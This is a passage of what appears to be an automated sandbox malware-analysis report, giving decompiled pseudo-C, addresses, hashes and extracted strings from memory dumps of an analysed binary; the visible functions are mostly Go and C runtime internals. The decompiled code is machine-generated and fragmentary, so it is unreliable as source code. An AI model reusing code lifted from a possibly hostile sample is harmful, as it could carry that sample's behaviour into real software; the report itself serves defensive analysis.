                                                                                                                            				_t28 = E0000025B25BF8A7B89C(_t51);
                                                                                                                            				 *_t51 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t28);
                                                                                                                            				goto 0xf8a89a87;
                                                                                                                            				if ( *((intOrPtr*)(_v32 + 8)) != 0) goto 0xf8a89a52;
                                                                                                                            				E0000025B25BF8A8A5A8(_t39, _t40, __edi,  *((intOrPtr*)(_v32 + 8)), __rbx, __rcx, __rdx, __rdx, __rcx, __r8, __r9);
                                                                                                                            				goto 0xf8a89a87;
                                                                                                                            				_t10 =  &_v40; // 0x2d
                                                                                                                            				_v48 =  *((intOrPtr*)(__rdx + 4));
                                                                                                                            				_v56 = __edi;
                                                                                                                            				r8d = 0x1001;
                                                                                                                            				_v64 = __rdx;
                                                                                                                            				_v72 = __edi;
                                                                                                                            				if (E0000025B25BF8A8A9F0(_t40,  *((intOrPtr*)(_v32 + 8)), _t51, _t53, _t10,  *((intOrPtr*)(__rdx + 0x220)), __rdx, __r8, __rcx, _t81) == 0) goto 0xf8a89a87;
                                                                                                                            				_t15 = _t51 - 2; // -2
                                                                                                                            				if (_v16 == 0) goto 0xf8a89a9a;
                                                                                                                            				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
                                                                                                                            				return _t15;
                                                                                                                            			}




















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3191669884-0
                                                                                                                            • Opcode ID: bb97e2f647bfa3a88a4f54fa0cf94b37a89101f96941e825206f7566504ce103
                                                                                                                            • Instruction ID: e25250f0a42d56135b5d9d7b60007cdc66d6081de6a99f2ecab9861a418c9a7b
                                                                                                                            • Opcode Fuzzy Hash: bb97e2f647bfa3a88a4f54fa0cf94b37a89101f96941e825206f7566504ce103
                                                                                                                            • Instruction Fuzzy Hash: 64314D73204B8089EB229B11EC8C75DB6A4E798BF2F694121FA5817F95DB34C852C734
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E01347D60(intOrPtr __ecx, signed int __edi, signed int __esi, void* __esp, signed long long __rax, long long __rbx, unsigned int __rdi, signed long long __rsi, long long __rbp, signed long long __r9, void* __r14, long long _a8, long long _a16, intOrPtr _a24, unsigned int _a32, signed long long _a40, signed int _a48) {
                                                                                                                            				char _v8;
                                                                                                                            				signed long long _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				void* _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				signed long long _v64;
                                                                                                                            				signed long long _v72;
                                                                                                                            				signed long long _v80;
                                                                                                                            				signed long long _v88;
                                                                                                                            				long long _v96;
                                                                                                                            				signed long long _v104;
                                                                                                                            				signed long long _v112;
                                                                                                                            				long long _v120;
                                                                                                                            				signed long long _v128;
                                                                                                                            				signed long long _v136;
                                                                                                                            				char _v140;
                                                                                                                            				signed int _t157;
                                                                                                                            				signed int _t205;
                                                                                                                            				void* _t206;
                                                                                                                            				long long _t218;
                                                                                                                            				signed long long _t219;
                                                                                                                            				long long _t220;
                                                                                                                            				signed long long _t230;
                                                                                                                            				signed long long _t231;
                                                                                                                            				long long _t232;
                                                                                                                            				signed long long _t243;
                                                                                                                            				signed long long _t248;
                                                                                                                            				signed long long _t253;
                                                                                                                            				long long _t254;
                                                                                                                            				signed long long _t257;
                                                                                                                            				signed long long _t259;
                                                                                                                            				signed long long _t264;
                                                                                                                            				long long _t268;
                                                                                                                            				signed long long _t269;
                                                                                                                            				signed long long _t270;
                                                                                                                            				signed long long _t271;
                                                                                                                            				signed long long _t272;
                                                                                                                            				signed long long _t275;
                                                                                                                            				signed long long _t277;
                                                                                                                            				void* _t279;
                                                                                                                            				signed long long _t280;
                                                                                                                            				intOrPtr _t282;
                                                                                                                            				unsigned long long _t283;
                                                                                                                            				long long _t286;
                                                                                                                            				long long _t290;
                                                                                                                            				unsigned long long _t291;
                                                                                                                            				char* _t294;
                                                                                                                            				signed long long _t310;
                                                                                                                            				signed long long _t311;
                                                                                                                            				signed long long _t312;
                                                                                                                            				signed long long _t313;
                                                                                                                            				void* _t316;
                                                                                                                            				void* _t317;
                                                                                                                            				void* _t318;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t317 = __r14;
                                                                                                                            					_t310 = __r9;
                                                                                                                            					_t284 = __rsi;
                                                                                                                            					_t273 = __rdi;
                                                                                                                            					_t245 = __rbx;
                                                                                                                            					_t214 = __rax;
                                                                                                                            					_t206 = __esp;
                                                                                                                            					_t205 = __esi;
                                                                                                                            					_t203 = __edi;
                                                                                                                            					_t199 = __ecx;
                                                                                                                            					if( &_v64 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L36:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a24 = __ecx;
                                                                                                                            					_a32 = __rdi;
                                                                                                                            					_a40 = __rsi;
                                                                                                                            					_a48 = r8b;
                                                                                                                            					E01356200(_t271, __rbp);
                                                                                                                            					r8d = _a48 & 0x000000ff;
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t294 =  &_v8;
                                                                                                                            				_a8 = __rax;
                                                                                                                            				_a16 = __rbx;
                                                                                                                            				if(__ecx == 0) {
                                                                                                                            					return 0xffffffff;
                                                                                                                            				} else {
                                                                                                                            					if(__rsi == 0) {
                                                                                                                            						L5:
                                                                                                                            						if(_t214 == 0) {
                                                                                                                            							if(r8b == 0 ||  *0x14cf348 != 0) {
                                                                                                                            								return 0xffffffff;
                                                                                                                            							} else {
                                                                                                                            								L01347B80(_t214, _t245, _t294, _t317);
                                                                                                                            								_v88 = _t214;
                                                                                                                            								E01332340(_t271, _t294, _t317);
                                                                                                                            								E01332C40(_t199, _t203, _t205, _t206, 0x138bb10, _t245, _t294, _t317);
                                                                                                                            								L01332AA0(_t201, _t203, _t206, _v88, _t253, _t294, _t317);
                                                                                                                            								E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
                                                                                                                            								L013323C0(_t271, _t294, _t317);
                                                                                                                            								_t218 = 0x13882b2;
                                                                                                                            								E01330BA0(0x13882b2, _t245, _t294);
                                                                                                                            								goto L12;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							_t271 =  *((intOrPtr*)(_t245 + 0x58));
                                                                                                                            							_t310 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                                            							_t312 =  *((intOrPtr*)(_t245 + 0x60));
                                                                                                                            							r11d = _t199;
                                                                                                                            							if(_t271 < _t313) {
                                                                                                                            								L29:
                                                                                                                            								_t214 = _t313;
                                                                                                                            								_t253 = _t271;
                                                                                                                            								L01358980();
                                                                                                                            								goto L30;
                                                                                                                            							} else {
                                                                                                                            								_a40 = _t284;
                                                                                                                            								_a48 = r8b;
                                                                                                                            								_v64 = _t313;
                                                                                                                            								_v72 = _t312;
                                                                                                                            								_v16 = _t310;
                                                                                                                            								_v24 = _t214;
                                                                                                                            								_v32 = _t245;
                                                                                                                            								_v80 = _t271;
                                                                                                                            								_a24 = _t199;
                                                                                                                            								_a32 = _t273;
                                                                                                                            								L01347B80(_t214, _t245, _t294, _t317);
                                                                                                                            								_v128 = _t214;
                                                                                                                            								_v140 = 0xffffffff;
                                                                                                                            								_t271 = _v64;
                                                                                                                            								_t259 = _v72 - _t271;
                                                                                                                            								_t286 = _v80 - _t271;
                                                                                                                            								_t275 = _t259;
                                                                                                                            								_t307 = _v16;
                                                                                                                            								_t254 = ( ~_t259 >> 0x0000003f & _t271) + _v16;
                                                                                                                            								L13:
                                                                                                                            								_v120 = _t286;
                                                                                                                            								_v56 = _t254;
                                                                                                                            								_v112 = _t275;
                                                                                                                            								_v136 = _t214;
                                                                                                                            								_t219 = _v24;
                                                                                                                            								L01347B80(_t219, _v32, _t294, _t317);
                                                                                                                            								r8b = _v128 == _t219;
                                                                                                                            								_t218 = _v56;
                                                                                                                            								_t245 = _v120;
                                                                                                                            								_t253 = _v112;
                                                                                                                            								_t157 = E01348B40(_t206, _t218, _t245, _t271,  &_v128,  &_v140, _t294, _t307, _t310, _t316, _t317, _t318);
                                                                                                                            								if(dil == 0) {
                                                                                                                            									if( *0x14cf348 != 0) {
                                                                                                                            										L23:
                                                                                                                            										return 0xffffffff;
                                                                                                                            									} else {
                                                                                                                            										_t201 = _a48 & 0x000000ff;
                                                                                                                            										if((_a48 & 0x000000ff) == 0) {
                                                                                                                            											goto L23;
                                                                                                                            										} else {
                                                                                                                            											_v96 = _t245;
                                                                                                                            											_v104 = _t253;
                                                                                                                            											_v40 = _t218;
                                                                                                                            											_t220 = _v24;
                                                                                                                            											_t248 = _v32;
                                                                                                                            											E01348360(_t220, _t248, _t294, _t317);
                                                                                                                            											_v48 = _t220;
                                                                                                                            											_v72 = _t248;
                                                                                                                            											_v88 = _v128;
                                                                                                                            											E01332340(_t271, _t294, _t317);
                                                                                                                            											E01332C40(_t199, _t203, _t205, _t206, 0x138d0cf, _t248, _t294, _t317);
                                                                                                                            											E01332C40(_t199, _t203, _t205, _t206, _v48, _v72, _t294, _t317);
                                                                                                                            											E01332C40(_t199, _t203, _t205, _t206, 0x138693f, _v72, _t294, _t317);
                                                                                                                            											L01332AA0(_t201, _t203, _t206, _v88, _v128, _t294, _t317);
                                                                                                                            											E01332C40(_t199, _t203, _t205, _t206, 0x1387470, _v72, _t294, _t317);
                                                                                                                            											L01332AA0(_t201, _t203, _t206, _a32, _v128, _t294, _t317);
                                                                                                                            											E01332C40(_t199, _t203, _t205, _t206, 0x1386a66, _v72, _t294, _t317);
                                                                                                                            											E01332CC0(_t199, _t201, _t203, _t205, _t206, _v40, _v96, _v104, _t271,  &_v128,  &_v140, _t294, _t317);
                                                                                                                            											E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
                                                                                                                            											L013323C0(_t271, _t294, _t317);
                                                                                                                            											_t245 = _v32;
                                                                                                                            											_t257 =  *((intOrPtr*)(_t245 + 0x58));
                                                                                                                            											_t271 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                                            											_t284 =  *((intOrPtr*)(_t245 + 0x60));
                                                                                                                            											if(_t257 >= _v64) {
                                                                                                                            												_v72 = _t284;
                                                                                                                            												_v16 = _t271;
                                                                                                                            												_v80 = _t257;
                                                                                                                            												_t230 = _v24;
                                                                                                                            												L01347B80(_t230, _t245, _t294, _t317);
                                                                                                                            												_v128 = _t230;
                                                                                                                            												_v140 = 0xffffffff;
                                                                                                                            												_t272 = _v64;
                                                                                                                            												_t264 = _v72 - _t272;
                                                                                                                            												_t290 = _v80 - _t272;
                                                                                                                            												_t280 = _t264;
                                                                                                                            												_t271 = _v16;
                                                                                                                            												_t268 = ( ~_t264 >> 0x0000003f & _t272) + _t271;
                                                                                                                            												while(1) {
                                                                                                                            													_v120 = _t290;
                                                                                                                            													_v56 = _t268;
                                                                                                                            													_v112 = _t280;
                                                                                                                            													_t231 = _v24;
                                                                                                                            													L01347B80(_t231, _v32, _t294, _t317);
                                                                                                                            													r8b = _v128 == _t231;
                                                                                                                            													_t232 = _v56;
                                                                                                                            													_t245 = _v120;
                                                                                                                            													_t269 = _v112;
                                                                                                                            													_t284 =  &_v140;
                                                                                                                            													E01348B40(_t206, _t232, _t245, _t271,  &_v128, _t284, _t294, _t307, _t310, _t316, _t317, _t318);
                                                                                                                            													if(dil == 0) {
                                                                                                                            														break;
                                                                                                                            													}
                                                                                                                            													_v56 = _t232;
                                                                                                                            													_v120 = _t245;
                                                                                                                            													_v112 = _t269;
                                                                                                                            													_v88 = _v128;
                                                                                                                            													E01332340(_t271, _t294, _t317);
                                                                                                                            													E01332C40(_t199, _t203, _t205, _t206, 0x1386eaf, _t245, _t294, _t317);
                                                                                                                            													E01332A40(_t199, _t201, _t203, _t205, _t206, _v140, _t284, _t294, _t317);
                                                                                                                            													E01332C40(_t199, _t203, _t205, _t206, 0x1387484, _t245, _t294, _t317);
                                                                                                                            													L01332AA0(_t201, _t203, _t206, _v88, _t269, _t294, _t317);
                                                                                                                            													E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
                                                                                                                            													L013323C0(_t271, _t294, _t317);
                                                                                                                            													_t290 = _v120;
                                                                                                                            													_t280 = _v112;
                                                                                                                            													_t268 = _v56;
                                                                                                                            												}
                                                                                                                            												E01330BA0(0x138b9c0, _t245, _t294);
                                                                                                                            											}
                                                                                                                            											L01358980();
                                                                                                                            											goto L28;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									_t271 = _v128;
                                                                                                                            									_t291 = _a32;
                                                                                                                            									if(_t291 >= _t271) {
                                                                                                                            										L12:
                                                                                                                            										_t286 = _t245;
                                                                                                                            										_t275 = _t253;
                                                                                                                            										_t254 = _t218;
                                                                                                                            										_t214 = _t271;
                                                                                                                            										goto L13;
                                                                                                                            									} else {
                                                                                                                            										_t271 = _a40;
                                                                                                                            										if(_t271 == 0) {
                                                                                                                            											L18:
                                                                                                                            											return _v140;
                                                                                                                            										} else {
                                                                                                                            											_t282 =  *((intOrPtr*)(_t317 + 0x30));
                                                                                                                            											_t270 = _t271;
                                                                                                                            											_t245 = 0x78bd642f;
                                                                                                                            											_t201 = _t157 * 0x477563b5d8094cf4 >> 0x20;
                                                                                                                            											 *((long long*)(_t282 + 0xf0)) = 0x78bd642f;
                                                                                                                            											_t283 = _t291;
                                                                                                                            											_t205 = _t205 & 0x00000001;
                                                                                                                            											_t284 = _t291 >> 3 << 7;
                                                                                                                            											_t307 = _t270 + _t284;
                                                                                                                            											r9d =  *((intOrPtr*)(_t270 + _t284 + 8));
                                                                                                                            											r10d =  *((intOrPtr*)(_t270 + _t284 + 0xc));
                                                                                                                            											_t313 =  *(_t270 + _t284);
                                                                                                                            											_t243 = (0x78bd642f +  *((intOrPtr*)(_t282 + 0xf0)) ^ _t271) << 3 >> 0x20;
                                                                                                                            											if(0x78bd642f >= 8) {
                                                                                                                            												L28:
                                                                                                                            												_t199 = 8;
                                                                                                                            												E013588C0();
                                                                                                                            												goto L29;
                                                                                                                            											} else {
                                                                                                                            												 *(_t307 + 0x78bd642f) = _t313;
                                                                                                                            												 *((intOrPtr*)(_t307 + 0xa0761d6478bd6437)) = r9d;
                                                                                                                            												 *((intOrPtr*)(_t307 + (_t243 << 4) + 0xc)) = r10d;
                                                                                                                            												 *(_t270 + _t284) = _t283;
                                                                                                                            												 *((intOrPtr*)(_t270 + _t284 + 8)) = _a24;
                                                                                                                            												 *((intOrPtr*)(_t270 + _t284 + 0xc)) = _v140;
                                                                                                                            												goto L18;
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						_t271 = __rdi;
                                                                                                                            						_t277 = __rdi >> 3;
                                                                                                                            						_t203 = __edi & 0x00000001;
                                                                                                                            						r9d = 0;
                                                                                                                            						L31:
                                                                                                                            						if(_t310 >= 8) {
                                                                                                                            							_t273 = _t271;
                                                                                                                            							goto L5;
                                                                                                                            						} else {
                                                                                                                            							_t312 = _t277;
                                                                                                                            							_t279 = (_t277 << 7) + _t284;
                                                                                                                            							_t313 = _t310;
                                                                                                                            							_t311 = _t310 << 4;
                                                                                                                            							r12d =  *((intOrPtr*)(_t279 + _t311 + 8));
                                                                                                                            							if(r12d != _t199 ||  *((intOrPtr*)(_t279 + _t311)) != _t271) {
                                                                                                                            								L30:
                                                                                                                            								_t310 = _t313 + 1;
                                                                                                                            								_t277 = _t312;
                                                                                                                            								goto L31;
                                                                                                                            							} else {
                                                                                                                            								return  *((intOrPtr*)(_t279 + _t311 + 0xc));
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}

                                                                                                                            0x0134812a
                                                                                                                            0x01348132
                                                                                                                            0x01348136
                                                                                                                            0x0134813a
                                                                                                                            0x01348149
                                                                                                                            0x0134814f
                                                                                                                            0x01348154
                                                                                                                            0x0134815c
                                                                                                                            0x01348161
                                                                                                                            0x01348169
                                                                                                                            0x0134816e
                                                                                                                            0x01348173
                                                                                                                            0x01348180
                                                                                                                            0x01348188
                                                                                                                            0x01348190
                                                                                                                            0x01348193
                                                                                                                            0x013481a0
                                                                                                                            0x013481a8
                                                                                                                            0x01348241
                                                                                                                            0x01348241
                                                                                                                            0x01348246
                                                                                                                            0x0134824e
                                                                                                                            0x01348253
                                                                                                                            0x01348263
                                                                                                                            0x0134826d
                                                                                                                            0x01348271
                                                                                                                            0x01348279
                                                                                                                            0x0134827e
                                                                                                                            0x01348288
                                                                                                                            0x0134828d
                                                                                                                            0x01348295
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013481c7
                                                                                                                            0x013481cf
                                                                                                                            0x013481d4
                                                                                                                            0x013481de
                                                                                                                            0x013481e3
                                                                                                                            0x013481f4
                                                                                                                            0x01348200
                                                                                                                            0x01348211
                                                                                                                            0x01348220
                                                                                                                            0x01348225
                                                                                                                            0x0134822a
                                                                                                                            0x0134822f
                                                                                                                            0x01348234
                                                                                                                            0x01348239
                                                                                                                            0x01348239
                                                                                                                            0x013482a7
                                                                                                                            0x013482a7
                                                                                                                            0x013482ac
                                                                                                                            0x00000000
                                                                                                                            0x013482ac
                                                                                                                            0x01348043
                                                                                                                            0x01347f58
                                                                                                                            0x01347f58
                                                                                                                            0x01347f5d
                                                                                                                            0x01347f68
                                                                                                                            0x01347eea
                                                                                                                            0x01347eea
                                                                                                                            0x01347eed
                                                                                                                            0x01347ef0
                                                                                                                            0x01347ef3
                                                                                                                            0x00000000
                                                                                                                            0x01347f6a
                                                                                                                            0x01347f6a
                                                                                                                            0x01347f75
                                                                                                                            0x01348013
                                                                                                                            0x0134802b
                                                                                                                            0x01347f7b
                                                                                                                            0x01347f7b
                                                                                                                            0x01347f9d
                                                                                                                            0x01347fa0
                                                                                                                            0x01347fa3
                                                                                                                            0x01347fa8
                                                                                                                            0x01347faf
                                                                                                                            0x01347fb6
                                                                                                                            0x01347fb9
                                                                                                                            0x01347fbd
                                                                                                                            0x01347fc1
                                                                                                                            0x01347fc6
                                                                                                                            0x01347fcb
                                                                                                                            0x01347fd8
                                                                                                                            0x01347fe4
                                                                                                                            0x013482b1
                                                                                                                            0x013482b1
                                                                                                                            0x013482b6
                                                                                                                            0x00000000
                                                                                                                            0x01347fea
                                                                                                                            0x01347fee
                                                                                                                            0x01347ff2
                                                                                                                            0x01347ff7
                                                                                                                            0x01348000
                                                                                                                            0x0134800b
                                                                                                                            0x0134800f
                                                                                                                            0x00000000
                                                                                                                            0x0134800f
                                                                                                                            0x01347fe4
                                                                                                                            0x01347f75
                                                                                                                            0x01347f68
                                                                                                                            0x01347f52
                                                                                                                            0x01347de4
                                                                                                                            0x01347da0
                                                                                                                            0x01347da0
                                                                                                                            0x01347da3
                                                                                                                            0x01347da7
                                                                                                                            0x01347daa
                                                                                                                            0x013482cd
                                                                                                                            0x013482d1
                                                                                                                            0x0134830e
                                                                                                                            0x00000000
                                                                                                                            0x013482d3
                                                                                                                            0x013482d3
                                                                                                                            0x013482da
                                                                                                                            0x013482dd
                                                                                                                            0x013482e0
                                                                                                                            0x013482e4
                                                                                                                            0x013482ec
                                                                                                                            0x013482c6
                                                                                                                            0x013482c6
                                                                                                                            0x013482ca
                                                                                                                            0x00000000
                                                                                                                            0x013482f7
                                                                                                                            0x0134830d
                                                                                                                            0x0134830d
                                                                                                                            0x013482ec
                                                                                                                            0x013482d1
                                                                                                                            0x01347d9d

                                                                                                                            Strings
                                                                                                                            • no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with G, xrefs: 01347ED9
                                                                                                                            • pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint, xrefs: 013480AF
                                                                                                                            • runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNorth Asia East Standard Timead, xrefs: 01347EAF
                                                                                                                            • targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiLockFileExManichaeanOld_ItalicOld_PermicOld_TurkicOther_Math, xrefs: 013480CF
                                                                                                                            • invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime., xrefs: 0134829B
                                                                                                                            • tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41, xrefs: 013480F2
                                                                                                                            • value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBaline, xrefs: 013481E8
                                                                                                                            • runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncachin, xrefs: 0134808C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-3376721504
                                                                                                                            • Opcode ID: 953b4cdb0b9d85c78a36ca99cba4aa3ec11dcda9dc68052ec3d0c93fa675f07d
                                                                                                                            • Instruction ID: 3db084696a44af80c45534bf2b7b863920faf064a1a088d53a1cdcea2a832428
                                                                                                                            • Opcode Fuzzy Hash: 953b4cdb0b9d85c78a36ca99cba4aa3ec11dcda9dc68052ec3d0c93fa675f07d
                                                                                                                            • Instruction Fuzzy Hash: B5D16732219BC186DB64DF69F88039EB7A5F789B94F548126EB8D43B68CF38D455CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E013010E0(void* __ebx, void* __fp0, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, void* __rsi, long long __rbp, signed long long __r8, void* __r14, signed long long _a8, signed long long _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				signed long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				signed long long _v32;
                                                                                                                            				signed long long _v40;
                                                                                                                            				signed long long _v48;
                                                                                                                            				signed long long _v56;
                                                                                                                            				signed long long _v64;
                                                                                                                            				signed long long _v72;
                                                                                                                            				signed long long _v80;
                                                                                                                            				signed long long _v88;
                                                                                                                            				signed long long _v96;
                                                                                                                            				signed long long _v104;
                                                                                                                            				signed int _v105;
                                                                                                                            				void* _t92;
                                                                                                                            				signed int _t114;
                                                                                                                            				void* _t121;
                                                                                                                            				signed int _t126;
                                                                                                                            				signed int _t127;
                                                                                                                            				void* _t128;
                                                                                                                            				void* _t144;
                                                                                                                            				signed long long _t152;
                                                                                                                            				signed long long _t154;
                                                                                                                            				signed long long _t172;
                                                                                                                            				signed long long _t180;
                                                                                                                            				long long _t181;
                                                                                                                            				intOrPtr _t184;
                                                                                                                            				signed long long _t185;
                                                                                                                            				signed long long _t187;
                                                                                                                            				signed long long _t188;
                                                                                                                            				signed long long _t191;
                                                                                                                            				signed long long _t193;
                                                                                                                            				signed long long _t194;
                                                                                                                            				signed int* _t196;
                                                                                                                            				signed long long _t197;
                                                                                                                            				signed long long _t204;
                                                                                                                            				signed long long _t205;
                                                                                                                            				signed long long _t206;
                                                                                                                            				intOrPtr _t207;
                                                                                                                            				signed long long _t208;
                                                                                                                            				signed long long _t209;
                                                                                                                            				signed long long _t212;
                                                                                                                            				void* _t215;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t215 = __r14;
                                                                                                                            					_t204 = __r8;
                                                                                                                            					_t199 = __rbp;
                                                                                                                            					_t185 = __rdx;
                                                                                                                            					_t180 = __rcx;
                                                                                                                            					_t174 = __rbx;
                                                                                                                            					_t152 = __rax;
                                                                                                                            					if( &_v8 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L73;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t199 =  &_v8;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					L3:
                                                                                                                            					while(_t174 != 0) {
                                                                                                                            						L42:
                                                                                                                            						while(_t180 < _t174) {
                                                                                                                            							_t127 =  *(_t152 + _t180) & 0x000000ff;
                                                                                                                            							if(sil != 0x2c) {
                                                                                                                            								L41:
                                                                                                                            								_t180 = _t180 + 1;
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							L44:
                                                                                                                            							L6:
                                                                                                                            							if(_t180 >= 0) {
                                                                                                                            								L8:
                                                                                                                            								if(_t180 > _t174) {
                                                                                                                            									L72:
                                                                                                                            									_t185 = _t174;
                                                                                                                            									L01358900();
                                                                                                                            									goto L73;
                                                                                                                            								}
                                                                                                                            								L9:
                                                                                                                            								_t6 = _t180 + 1; // 0x100000000
                                                                                                                            								_t197 = _t6;
                                                                                                                            								if(_t174 < _t197) {
                                                                                                                            									L71:
                                                                                                                            									_t152 = _t197;
                                                                                                                            									L01358980();
                                                                                                                            									goto L72;
                                                                                                                            								}
                                                                                                                            								L10:
                                                                                                                            								_t174 = _t174 - _t180;
                                                                                                                            								_t188 = _t174 - 1;
                                                                                                                            								_t204 = _t188;
                                                                                                                            								_t197 = (_t197 &  ~_t188 >> 0x0000003f) + _t152;
                                                                                                                            								L11:
                                                                                                                            								if(_t180 < 4 ||  *_t152 != 0x2e757063) {
                                                                                                                            									L2:
                                                                                                                            									_t152 = _t197;
                                                                                                                            									_t174 = _t204;
                                                                                                                            									goto L3;
                                                                                                                            								} else {
                                                                                                                            									L13:
                                                                                                                            									L46:
                                                                                                                            									while(_t185 < _t180) {
                                                                                                                            										_t126 =  *(_t152 + _t185) & 0x000000ff;
                                                                                                                            										if(dil != 0x3d) {
                                                                                                                            											L45:
                                                                                                                            											_t185 = _t185 + 1;
                                                                                                                            											continue;
                                                                                                                            										}
                                                                                                                            										L48:
                                                                                                                            										L15:
                                                                                                                            										_v56 = _t204;
                                                                                                                            										_v16 = _t197;
                                                                                                                            										if(_t185 < 0) {
                                                                                                                            											L29:
                                                                                                                            											_v96 = _t180;
                                                                                                                            											_v32 = _t152;
                                                                                                                            											E01332340(_t185, _t199, _t215);
                                                                                                                            											E01332C40(0, _t126, _t127, _t128, 0x138c8d1, _t174, _t199, _t215);
                                                                                                                            											E01332C40(0, _t126, _t127, _t128, _v32, _v96, _t199, _t215);
                                                                                                                            											E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v96, _t199, _t215);
                                                                                                                            											_t92 = L013323C0(_t185, _t199, _t215);
                                                                                                                            											_t197 = _v16;
                                                                                                                            											_t204 = _v56;
                                                                                                                            											goto L2;
                                                                                                                            										}
                                                                                                                            										L16:
                                                                                                                            										if(_t185 > _t180) {
                                                                                                                            											L70:
                                                                                                                            											L01358900();
                                                                                                                            											goto L71;
                                                                                                                            										}
                                                                                                                            										L17:
                                                                                                                            										if(_t185 < 4) {
                                                                                                                            											L69:
                                                                                                                            											_t180 = _t185;
                                                                                                                            											L01358980();
                                                                                                                            											goto L70;
                                                                                                                            										}
                                                                                                                            										L18:
                                                                                                                            										_t10 = _t185 - 4; // -3
                                                                                                                            										_t191 = _t10;
                                                                                                                            										_t206 = _t191;
                                                                                                                            										_t193 =  ~_t191 >> 0x3f;
                                                                                                                            										_t126 = _t126 & 0x00000004;
                                                                                                                            										_t174 = _t152 + _t193;
                                                                                                                            										_t12 = _t185 + 1; // 0x2
                                                                                                                            										_t208 = _t12;
                                                                                                                            										if(_t180 < _t208) {
                                                                                                                            											L68:
                                                                                                                            											L01358980();
                                                                                                                            											goto L69;
                                                                                                                            										}
                                                                                                                            										L19:
                                                                                                                            										_v64 = _t206;
